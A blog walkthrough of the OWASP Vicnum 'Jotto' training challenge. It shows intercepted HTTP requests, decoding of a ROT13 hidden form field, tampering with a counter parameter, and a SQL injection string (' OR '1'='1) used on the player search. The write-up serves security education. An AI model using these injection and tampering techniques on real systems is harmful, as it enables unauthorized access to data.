Playing Jotto at OWASP AppSecEU 2011

Jotto.. what the hack is that? Well, Jotto is a part of the Vicnum project which was developed for educational purposes to demonstrate common web vulnerabilities, as apart of OWASP project. Actually Jotto is game, the game play is The computer will think of a five letter word with unique letters. After you attempt to guess the word, the computer will tell you whether you guessed the word successfully, or how many of the letters in your word
match the computer’s word. Keep on submitting five letter words until you have guessed the computer’s word. To make it more interesting, OWASP challenge the user to hack the Jotto algorithm and word database.

OK lets go start it. Open you browser and play a little while with Jotto at here . If you get stuck, you might read my entire post, but I suggest you to try it first (as I do) before you read my article.

Since you want to read my post, the I will explain it to you how to solve the Jotto challenge. First prepare the gun, I’m using Burpsuite and online decoder. Now, try to insert your nick name in the text-box and start the game by push the play button. Next try to guest the word that has been “thinking” by Jotto. Before you start to answer the question, fire up the Burpsuite first (I will not explain how to config the Burpsuite in here, you might refer to google on how to use it). Then next, try to submit your answer, in my position I tried to type aaaaa. Burpsuite will catch the POST process

POST /cgi-bin/jotto2.pl HTTP/1.1
Host: jotto.ciphertechs.com
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.16) Gecko/20110323 Ubuntu/10.04 (lucid) Firefox/3.6.16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://jotto.ciphertechs.com/cgi-bin/jotto1.pl
Cookie: oreos=cyb3r.anbu; chipsahoy=0; mallomar=fcragren
Content-Type: application/x-www-form-urlencoded
Content-Length: 55userguess=aaaaa&player=cyb3r.anbu&guess=svany&oldguess=

from the information above we could know that the page tried to send some data to the server

userguess=aaaaa&player=cyb3r.anbu&guess=svany&oldguess=

There are 4 variable which the page tried to send , userguess which is our answer then player variable which is our nickname then guess which we don’t know yet what is that thing is and last is oldguess, same as guess variable, we still have no clue what for is it. OK, next try to submit the answer, luckily (in my position) the Jotto said that the a letter is one of the rite’ char.Well, at least now I already knew that between the five letters, one of them is a.
After trying around with some input, now we could know that oldguess is a variable that used to store the answer from previous action. Now the question is what about the guess variable? what is it exactly? I tried to use the send it into Burpsuite decoder/encoder, but still have no result. Looks like it’s not encode using the method which was listed on Burpsuite. Next I tried to use online decoder in here and try to check the string with all the listed encryptor/decryptor, one by one, then finally it shows a readable string final. It was encode with ROT13 method.

Now it’s time to test the string, first I turn of f the Bursuite, then I tried to set final as my answer and there it goes, Jotto said:

Congratulations bla bla bla

Well, looks like now we already pass the first challenge, try to read the word (every letter). To make sure that guess variable is the real answer for every question, lets try to start the game again. But now without using the Burpsuite. After enter the nickname, next try to read the html source which, inside the form tag we could found the guess variable in there.

input type="hidden" name="guess" value="nohfr"

now, go to online decoder site and try to decode the nohfr with ROT13 decoder it will show the real string, in this case it shows abuse. Next try to enter this string into the textbox and hit the GUESS button. Well done! we answer the rite’ word.
Before you push the CONTINUE button, try to fire up Burpsuite again to catch what data will be send by the page. Here what we got

POST /cgi-bin/jotto3.pl HTTP/1.1
Host: jotto.ciphertechs.com
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.16) Gecko/20110323 Ubuntu/10.04 (lucid) Firefox/3.6.16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://jotto.ciphertechs.com/cgi-bin/jotto2.pl
Cookie: oreos=cyb3r.anbu; chipsahoy=1; mallomar=svryq
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
player=cyb3r.anbu&cnt=1&guess=nohfr

Well now we have another variable in here, it’s the cnt variable. To find out what is it, try to repeat all the step from beginning then after the Congrats page set up the Burpsuite and try to edit the cnt value into 0, then forward the packet, let see what happen. Surprise, obviously the cnt variable hold the counter value. Now, the system tell us that we had successfully answer the answer in 0 (zero) attempt.

Next thing to do is try to hack the database system. Let’s try some classic way, with trying to inject a SQL command into the Jotto queries system, in here it should be the searching player menu. You might find the page after you send the correct answer page, at this page exactly http://jotto.ciphertechs.com/jotto4.php
Now. lets try to enter sql injection strings into the input textbox. I will using

cyb3r.anbu' OR '1'='1

and here come the result

Search Results

You have requested results for Jotto player cyb3r.anbu' OR '1'='1 : find the last name in the jotto file has guessed bjnfc in 2147483647 guess(es) on 2011-03-15 09:19:49 cyb3r.anbu has guessed token in 1 guess(es) on 2011-04-26 07:10:08 brokecyb3r.anbu has guessed spent in 0 guess(es) on 2011-04-26 05:22:29 brokecyb3r.anbu has guessed image in 0 guess(es) on 2011-04-26 05:17:07 guessedcyb3r.anbu has guessed young in 0 guess(es) on 2011-04-26 04:42:25

OK good, this would be a good sign for us. At first, I got a little confuse in here. After reading the result repeatedly, finally I start to understand what is the next things to do. Pay attention to the second line from the result

find the last name in the jotto file has guessed bjnfc in 2147483647 guess(es) on 2011-03-15 09:19:49

using ROT13 decoder, I tried to decode the bjnfc string , which will produce owasp string. Ok now I have the string what next, have alittle problem in here but next I realize that the statement said find the last name in the jotto file, now I need to search that Jotto file. Again I start my Burpsuite, try to runs the spider tool againts the Jotto site. After a while, finaly the sipder shows a good result, it found a file name jotto inside the website

http://jotto.ciphertechs.com/jotto/jotto</blockquote>

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 09:06:27 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.1 with Suhosin-Patch
Last-Modified: Thu, 14 Apr 2011 14:18:39 GMT
ETag: "2c807c-b4-4a0e19a05cdc0"
Accept-Ranges: bytes
Content-Length: 180
Connection: close
Content-Type: text/plainabout
abuse
basic
black
broke
brown
clean
clear
field
final
image
index
macro
magic
major
opera
prize
probe
prove
proxy
right
slave
token
virus
white
worms
yield
young
owasp
broke

Nice!! ok from the statement we should look at the last word after the owasp string, the it’s gonna be broke! Next I try to put the string into the player input, try to run the application as before but nothing happen with the player list, with some try and error I tried to put the string with my nickname brokecyb3r.anbu, and again try to load the player list, and there is my nick name in there. Congrats to you, now your nickname already listed on the hall of fame page 😛 *LOL

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About Spentera

We are specializing in penetration test, vulnerability assessment, computer forensics, as well as intrusion analyst and malware analysis. Customers can contact us directly at contact[at]spentera[dot]id, or use Contact Our Team menu on the sidebar.